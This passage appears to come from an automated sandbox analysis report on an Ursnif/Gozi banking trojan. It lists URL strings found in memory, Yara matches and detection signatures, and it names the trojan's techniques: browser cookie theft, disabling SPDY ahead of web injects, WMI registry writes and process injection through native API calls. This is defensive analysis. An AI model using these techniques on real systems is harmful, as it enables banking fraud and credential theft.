            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml1.3.drString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml2.3.drString found in binary or memory: http://www.live.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml3.3.drString found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml4.3.drString found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml5.3.drString found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml6.3.drString found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml7.3.drString found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            E-Banking Fraud:

            barindex
            Detected Gozi e-Banking trojanShow sources
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: 73750000 page execute and read and write
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73751CEF GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737515AB GetLastError,NtClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73751880 NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737524C5 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00461813 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00446825 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00453A77 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045620F GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045A3DE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0046345F NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00462557 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00441D18 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044C536 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045865A NtQueryInformationProcess,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044976D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00450084 memset,NtQueryInformationProcess,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00465A8E NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045AAB7 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00444C96 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00457511 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00442D26 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00448DAA NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00446F11 NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB387C NtCreateSection,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB3830 NtWriteVirtualMemory,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB1AC4 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FABAB4 NtAllocateVirtualMemory,
